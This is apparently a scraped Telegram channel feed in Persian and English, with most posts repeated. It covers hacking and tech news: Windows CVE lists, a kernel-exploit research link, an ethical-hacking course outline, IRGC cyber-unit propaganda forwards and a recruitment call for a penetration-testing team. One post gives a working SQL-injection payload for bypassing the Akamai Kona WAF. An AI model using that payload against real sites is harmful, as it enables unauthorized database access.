Run compilers interactively from your web browser and interact with the assembly with almost any high level language.
با زبانهای برنامهنویسی مختلف کد بزنید و به صورت realtime کد اسمبلی تولید شده با انواع و اقسام compiler ها رو مثل gcc یا clang رو ببینید و باهاش کار کنید.
@Unidentified_TM
با زبانهای برنامهنویسی مختلف کد بزنید و به صورت realtime کد اسمبلی تولید شده با انواع و اقسام compiler ها رو مثل gcc یا clang رو ببینید و باهاش کار کنید.
@Unidentified_TM
Forwarded from Predator-OS
This media is not supported in your browser
VIEW IN TELEGRAM
Little-Psycho Linux
============================
It is a lightweight Linux with a plasma Desktop and complementary to the predator-os Linux. It is a Harmful, Destructive,changer, Terminator, stress testing, system, and resilience testing in terms of hardware and software.
Included overclocking and health testing tools are used on the system.
============
Designer and Developer by :Hossein Seilany
finally. Released this week.
============================
It is a lightweight Linux with a plasma Desktop and complementary to the predator-os Linux. It is a Harmful, Destructive,changer, Terminator, stress testing, system, and resilience testing in terms of hardware and software.
Included overclocking and health testing tools are used on the system.
============
Designer and Developer by :Hossein Seilany
finally. Released this week.
پروژه جدید گیت هاب به نام copilot
این پروژه Copilot به این صورت کار میکنه که میگی من یه کدی میخوام که یه کاریو برام انجام بده ، مثلا یه کدی میخوام که ببینه یک متن مثبته یا منفی و میخوام از یه سرویس آنلاین استفاده کنم . خودش میاد براتون کدو مینویسه
یه چیز توی مایه های Autocomplete اه که با کمک هوش مصنوعی نوشته شده .
Github
@Unidentified_TM
این پروژه Copilot به این صورت کار میکنه که میگی من یه کدی میخوام که یه کاریو برام انجام بده ، مثلا یه کدی میخوام که ببینه یک متن مثبته یا منفی و میخوام از یه سرویس آنلاین استفاده کنم . خودش میاد براتون کدو مینویسه
یه چیز توی مایه های Autocomplete اه که با کمک هوش مصنوعی نوشته شده .
Github
@Unidentified_TM
EthicalHackingHTBDGv1.pdf
12.7 MB
1.
Getting Started
2.
Enumeration: Networks, SMB, DNS and Websites
3.
Enumeration: Web Vulnerabilities
4.
Initial Access: Shells and Remote Services
5.
Initial Access: Custom Exploits
6.
Initial Access: Social Engineering
7.
Linux Enumeration and Privilege Escalation
8.
Windows Enumeration and Privilege Escalation
9.
Windows Active Directory Enumeration and Privilege Escalation
10.
Defense Evasion
11.
Command & Control and Persistence
@Unidentified_TM
Getting Started
2.
Enumeration: Networks, SMB, DNS and Websites
3.
Enumeration: Web Vulnerabilities
4.
Initial Access: Shells and Remote Services
5.
Initial Access: Custom Exploits
6.
Initial Access: Social Engineering
7.
Linux Enumeration and Privilege Escalation
8.
Windows Enumeration and Privilege Escalation
9.
Windows Active Directory Enumeration and Privilege Escalation
10.
Defense Evasion
11.
Command & Control and Persistence
@Unidentified_TM
Forwarded from سپاه سایبری پاسداران IRGC 🏴
This media is not supported in your browser
VIEW IN TELEGRAM
🎥 فوری| تصاویر هلیبرن و عملیات برخورد پاسداران سپاه با ناوهای جنگی آمریکا و توقیف نفتکش
سپاه سایبری پاسداران👇🏻
☑️ @SEPAHCYBERY
سپاه سایبری پاسداران👇🏻
☑️ @SEPAHCYBERY
dstask: Single binary terminal-based TODO manager with git-based sync + markdown notes per task
https://github.com/naggie/dstask
@Unidentified_TM
https://github.com/naggie/dstask
@Unidentified_TM
سلام خدمت دوستان گل
مدتی بود ربات پشتیبانی در دسترس نبود ولی از الان دوباره میتونید پیام بزارید داخل ربات نظرات و انتقادات خودتون رو .
@Unidentified_TM_bot
مدتی بود ربات پشتیبانی در دسترس نبود ولی از الان دوباره میتونید پیام بزارید داخل ربات نظرات و انتقادات خودتون رو .
@Unidentified_TM_bot
Forwarded from خبرفوری (ادمین ۱)
🔺واکنش فرمانده سپاه به حادثه دیروز در دریای عمان:
🔹همه مجاهدان نیروی دریایی، هر کدام یک حاج قاسم بودند
🔹خطاب به مردم می گویم،در صحنه بمانید؛ چیزی به پایان راه نمانده است؛ فجر اکبر نزدیک است.
@khabarfouri
🔹همه مجاهدان نیروی دریایی، هر کدام یک حاج قاسم بودند
🔹خطاب به مردم می گویم،در صحنه بمانید؛ چیزی به پایان راه نمانده است؛ فجر اکبر نزدیک است.
@khabarfouri
CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF)
@Unidentified_TM
https://research.nccgroup.com/2021/07/15/cve-2021-31956-exploiting-the-windows-kernel-ntfs-with-wnf-part-1/
@Unidentified_TM
https://research.nccgroup.com/2021/07/15/cve-2021-31956-exploiting-the-windows-kernel-ntfs-with-wnf-part-1/
Nccgroup
Cyber Security Research
Cutting-edge cyber security research from NCC Group. Find public reports, technical advisories, analyses, & other novel insights from our global experts.
As you know, the Muro Team Rules rule Most of the members we accepted were from within the same training and information channel.
And we used a lot of capable kids as a team
After a long time again, if the people in these cases mentioned below are capable, they can send a resume of themselves and their professional description to the support robot until the night we review and absorb:
1- Web software development (back and front)
2. Security researcher, testing and penetration, active in the field of security and network
Several questions to ask:
What kind of activity is the most frequently asked question about this
Answer: We attract all the people who are really capable and we add them to the private group we have and give them advanced training. It is worth mentioning that we accepted many friends up to the selection stages but did not inform them. There were different reasons. It depended on the fake identity of the party. Please do not try to play smart. Try to progress with professional friends and you will enjoy the support of these friends.
Note: Do not see a message with a fake account that cannot be read
Relationship :
@Unidentified_TM_bot
And we used a lot of capable kids as a team
After a long time again, if the people in these cases mentioned below are capable, they can send a resume of themselves and their professional description to the support robot until the night we review and absorb:
1- Web software development (back and front)
2. Security researcher, testing and penetration, active in the field of security and network
Several questions to ask:
What kind of activity is the most frequently asked question about this
Answer: We attract all the people who are really capable and we add them to the private group we have and give them advanced training. It is worth mentioning that we accepted many friends up to the selection stages but did not inform them. There were different reasons. It depended on the fake identity of the party. Please do not try to play smart. Try to progress with professional friends and you will enjoy the support of these friends.
Note: Do not see a message with a fake account that cannot be read
Relationship :
@Unidentified_TM_bot
Forwarded from Predator-OS
The Little-Psycho Linux
====================
Hossein seilany has announced the release v 1.0 of a new development of The Little-Psycho Linux.
===================
This is lightweight Linux with a KDE plasma desktop, based on the Ubuntu mini 20.04 LTS and equipped kernel 5.10 LTS and 5.8. Little-Psycho has a focus on destructive and stress testing of both software and hardware and also included the overclocking and health testing tools. These tools and commands impose much stress on the system and measure the performance of the system
==============================
https://predator-os.com/#Little-Psycho
====================
Hossein seilany has announced the release v 1.0 of a new development of The Little-Psycho Linux.
===================
This is lightweight Linux with a KDE plasma desktop, based on the Ubuntu mini 20.04 LTS and equipped kernel 5.10 LTS and 5.8. Little-Psycho has a focus on destructive and stress testing of both software and hardware and also included the overclocking and health testing tools. These tools and commands impose much stress on the system and measure the performance of the system
==============================
https://predator-os.com/#Little-Psycho
Forwarded from Predator-OS
Little-Psycho Linux V 1.0.pdf
3.1 MB
SQLI
Akamai Kona Bypass
MID instead of SUBSTRING
LIKE instead of =
// instead of a space
CURRENT_USER instead of CURRENT_USER()
" instead of '
Final example:
444//OR//MID(CURRENT_USER,1,1)//LIKE//"p"//#
@Unidentified_TM
Akamai Kona Bypass
MID instead of SUBSTRING
LIKE instead of =
// instead of a space
CURRENT_USER instead of CURRENT_USER()
" instead of '
Final example:
444//OR//MID(CURRENT_USER,1,1)//LIKE//"p"//#
@Unidentified_TM
< نوامبر 2021 پچ سه شنبه >
مایکروسافت پچ های امنیتی را برای 55 آسیبپذیری جدید منتشر میکند، از جمله دو نقص زیرو-دی در اکسل (CVE-2021-42292) و Exchange Server (CVE-2021-42321).
CVE-2021-43208 (CVSS score: 7.8) - 3D Viewer Remote Code Execution Vulnerability
CVE-2021-43209 (CVSS score: 7.8) - 3D Viewer Remote Code Execution Vulnerability
CVE-2021-38631 (CVSS score: 4.4) - Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability
CVE-2021-41371 (CVSS score: 4.4) - Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability
@Unidentified_TM
مایکروسافت پچ های امنیتی را برای 55 آسیبپذیری جدید منتشر میکند، از جمله دو نقص زیرو-دی در اکسل (CVE-2021-42292) و Exchange Server (CVE-2021-42321).
CVE-2021-43208 (CVSS score: 7.8) - 3D Viewer Remote Code Execution Vulnerability
CVE-2021-43209 (CVSS score: 7.8) - 3D Viewer Remote Code Execution Vulnerability
CVE-2021-38631 (CVSS score: 4.4) - Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability
CVE-2021-41371 (CVSS score: 4.4) - Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability
@Unidentified_TM